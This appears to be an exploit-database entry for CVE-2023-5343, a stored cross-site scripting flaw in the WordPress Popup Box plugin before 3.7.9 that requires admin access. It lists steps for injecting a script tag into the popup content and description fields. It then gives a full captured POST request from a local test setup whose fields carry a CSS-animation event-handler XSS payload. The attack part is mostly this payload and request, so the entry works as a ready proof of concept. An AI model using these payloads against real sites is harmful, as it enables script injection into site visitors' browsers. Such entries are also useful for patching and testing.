Exploit for Popup Box < 3.7.9 - Admin+ Stored XSS CVE-2023-5343

Name: Exploit for Popup Box < 3.7.9 - Admin+ Stored XSS CVE-2023-5343
Rating: 5 (4 reviews)
2023-10-27 | CVSS 4.3
## https://sploitus.com/exploit?id=WPEX-ID:74613B38-48F2-43D5-BAE5-25C89BA7DB6E
1) Create a new popup via /wp-admin/admin.php?page=ays-pb&action=add
2) Set its "Custom content" and "Popup description" fields to the following:

<script>alert(1);</script>

3) Save, and notice the alert box appearing when re-editing the popup, and visiting the website.


POST /wordpress/wp-admin/admin.php?page=ays-pb&action=edit&popupbox=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=ays-pb&action=edit&popupbox=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4290
Origin: http://127.0.0.1
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=kali%7C1696181904%7CzrEBHf1Q66UpOkWCjcqHgyQq0Q6aUR7Ij0ZhEpcuqsO%7C41c514d5745a209827a1c13306cffbd812d2cf6b270cfe6045a8931b460305aa; wp-saving-post=263-check; wp-settings-time-1=1696155330; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Df%26editor%3Dtinymce%26posts_list_mode%3Dlist; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=kali%7C1696181904%7CzrEBHf1Q66UpOkWCjcqHgyQq0Q6aUR7Ij0ZhEpcuqsO%7Cc0d1bf9e142520c5414b0a159a7b3fda4fbc068c90c50c56448252ddce1e578f; tk_ai=woo%3A0buQ60dSuiF4K2AY%2B%2BCokhgR; mailpoet_page_view=%7B%22timestamp%22%3A1695569544%7D; mailpoet_subscriber=%7B%22subscriber_id%22%3A1%7D; __stripe_mid=d1a79458-aaa1-4cc6-8052-d6efff09c0cd89a9e5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

ays_pb_tab=tab1&ays_pb_create_date=2023-10-01+15%3A10%3A41&ays_pb_author=%7B%22id%22%3A%221%22%2C%22name%22%3A%22kali%22%7D&ays-pb%5Bonoffswitch%5D=on&ays-pb%5Bpopup_title%5D=Demo+Title&ays-pb%5Bshortcode%5D=&ays-pb%5Bcustom_html%5D=Introducing+your+%3Cstrong%3EFirst+Popup%3C%2Fstrong%3E.%0D%0ACustomize+text+and+design+to+%3Cem%3Eperfectly+suit%3C%2Fem%3E+your+needs+and+preferences.%0D%0A%0D%0A%3Cstrong%3Etest1%3C%2Fstrong%3E<style>%40keyframes+x{}</style>+<b+style%3d"animation-name%3ax"+onanimationstart%3d"alert('XSS+1')"></b>&ays_video_theme_url=&ays-pb%5Bpopup_description%5D=Demo+Description%0D%0A%0D%0A%3Cstrong%3Etest2%3C%2Fstrong%3E%0D%0A%0D%0A%26nbsp%3B<style>%40keyframes+x{}</style>+<b+style%3d"animation-name%3ax"+onanimationstart%3d"alert('XSS+2')"></b>&ays-pb%5Bshow_all%5D=all&ays-pb%5Baction_button_type%5D=pageLoaded&ays-pb%5Baction_button%5D=&ays-pb%5Bpb_position%5D=center-center&ays_pb_position_mobile=center-center&ays-pb%5Bpb_margin%5D=0&ays-pb%5Bdelay%5D=0&ays_pb_open_delay_mobile=0&ays-pb%5Bscroll_top%5D=0&ays_pb_scroll_top_mobile=0&close_popup_esc=on&ays_pb_close_button_position=right-top&ays_pb_close_button_position_mobile=right-top&ays_pb_close_button_text=%E2%9C%95&ays_pb_close_button_text_mobile=%E2%9C%95&ays_pb_enable_close_button_text_mobile=on&ays_pb_close_button_hover_text=&ays-pb%5Bautoclose%5D=20&ays_pb_autoclose_mobile=20&ays_pb_close_button_delay=0&ays_pb_close_button_delay_for_mobile=0&close_popup_scroll=&ays_enable_close_by_classname=on&ays_pb_close_by_classname_=ays_pb_close_by_classname_1&ays_pb_popup_name=&ays_popup_category=1&ays-pb%5Bonoffoverlay%5D=on&ays-pb%5Boverlay_opacity%5D=0.5&ays_pb_overlay_mobile_opacity=0.5&ays-pb%5Bcookie%5D=0&ays_pb_social_buttons_heading=&ays_social_links%5Bays_pb_linkedin_link%5D=&ays_social_links%5Bays_pb_facebook_link%5D=&ays_social_links%5Bays_pb_twitter_link%5D=&ays_social_links%5Bays_pb_vkontakte_link%5D=&ays_social_links%5Bays_pb_youtube_link%5D=&ays_social_links%5Bays_pb_instagram_link%5D=&ays_social_links%5Bays_pb_behance_link%5D=&ays-active=2023-10-01+15%3A17%3A20&ays-deactive=2023-10-01+15%3A17%3A20&ays_pb_change_creation_date=2023-10-01+15%3A10%3A41&ays_pb_create_author=1&ays_pb_enable_dismiss_text=Dismiss+ad&enable_content_click=on&enable_close_content_click=on&enable_redirect_content_click=on&redirect_url_content_click=&enable_new_tab_content_click=on&ays-pb%5Bview_type%5D=default&show_popup_title=on&show_popup_desc=on&ays-pb%5Bwidth%5D=700&ays_popup_width_by_percentage_px=pixels&ays_pb_mobile_width=&ays_pb_mobile_max_width=&ays-pb%5Bheight%5D=400&ays_pb_mobile_height=&ays_pb_min_height=&ays_popup_content_padding=20&ays_popup_padding_by_percentage_px=pixels&ays-pb%5Bays_pb_textcolor%5D=%23000000&ays_pb_font_family=Inherit&ays_pb_font_size=13&ays_pb_font_size_for_mobile=13&ays_title_text_shadow_color=rgba%28255%2C255%2C255%2C0%29&ays_pb_title_text_shadow_x_offset=2&ays_pb_title_text_shadow_y_offset=2&ays_pb_title_text_shadow_z_offset=0&enable_title_styles=on&title_font_size=&title_letter_spacing=&title_line_height=&ays_pb_animation_speed=1&ays_pb_close_animation_speed=1&ays-pb%5Banimate_out%5D=fadeOutUpBig&ays-pb%5Banimate_in%5D=fadeIn&ays-pb%5Bbgcolor%5D=%23ffffff&ays_pb_bg_image=&ays_pb_bg_image_position=center-center&ays_pb_bg_image_sizing=cover&ays_background_gradient_color_1=%23000&ays_background_gradient_color_2=%23fff&ays_pb_gradient_direction=vertical&ays-pb%5Bheader_bgcolor%5D=%23ffffff&ays_pb_overlay_color=%23000&ays-pb%5Bays_pb_bordersize%5D=1&ays_pb_border_style=Dotted&ays-pb%5Bays_pb_bordercolor%5D=%23ffffff&ays-pb%5Bays_pb_border_radius%5D=7&ays_pb_buttons_size=small&ays_pb_button_text_color=%23000&ays_pb_button_background_color=%2313aff0&ays_pb_buttons_font_size=17&ays_pb_buttons_width=&ays_pb_buttons_left_right_padding=20&ays_pb_buttons_top_bottom_padding=10&ays_pb_buttons_border_radius=3&ays_pb_close_btn_bg_img=&ays_pb_close_button_color=%23000000&ays_pb_close_button_hover_color=%23000000&ays_pb_close_button_size=1&ays_pb_box_shadow_color=%23000&ays_pb_box_shadow_x_offset=0&ays_pb_box_shadow_y_offset=0&ays_pb_box_shadow_z_offset=15&ays_pb_bg_image_direction_on_mobile=on&ays-pb%5Bcustom-class%5D=&ays-pb%5Bcustom-css%5D=&ays-pb%5Blog_user%5D=on&ays-pb%5Bguest%5D=on&pb_action=763cad31b7&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Days-pb%26action%3Dedit%26popupbox%3D1&ays_submit=Save+and+close&ays-pb%5Bmodal_content%5D=custom_html